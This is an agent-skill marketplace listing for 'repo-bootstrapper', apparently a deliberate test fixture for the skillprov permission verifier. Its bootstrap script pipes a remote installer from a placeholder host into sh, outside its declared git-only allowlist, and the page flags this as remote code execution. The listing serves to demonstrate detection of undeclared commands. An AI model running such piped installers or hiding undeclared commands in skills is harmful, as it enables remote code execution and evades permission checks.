Install
$ agentstack add skill-supermarioyl-skillprov-exec-mismatch Open-source listing, not yet scanned by AgentStack. Follow the source repository for install instructions.
Security review
⚠ Flagged1 finding(s); flagged for manual review. · v0.1.0 How review works →
- • Prompt-injection patterns
- • Secret / credential exfiltration
- • Dangerous shell & filesystem operations
- • Untrusted network calls
- • Known-malicious package signatures
- high Pipes remote content directly into a shell (remote code execution).
What it can access
- ● Network access Used
- ✓ Filesystem access No
- ✓ Shell / process execution No
- ✓ Environment & secrets No
- ✓ Dynamic code execution No
From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.
Reliability & compatibility
Declared compatibility
Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.
We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.
How agent discovery & health will work →About
repo-bootstrapper
This skill declares a narrow exec footprint: its capabilities.commands allowlist says it only ever shells out to git (and its network is scoped to get.example.com, which it is allowed to reach).
But scripts/bootstrap.sh quietly does more than it declared: it pipes a remote installer into a shell — curl https://get.example.com/install.sh | sh — running two commands, curl and sh, that are NOT in the declared commands allowlist.
Under v0.1/v0.2 this skill verified GREEN, because the coarse exec class was declared (and the host it talks to is on its allowlist, so the v0.2 host diff is satisfied). As of v0.3, skillprov verify diffs the exec allowlist at value granularity: the off-allowlist curl and sh each produce a red REJECTED with exit code 1, naming the exact undeclared command — while the in-policy git invocation stays clean.
Source & license
This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.
- Author: SuperMarioYL
- Source: SuperMarioYL/skillprov
- License: MIT
Install and usage instructions live in the source repository linked above.
Reviews
No reviews yet, be the first.
Write a review
Versions
- v0.1.0 Imported from the upstream source.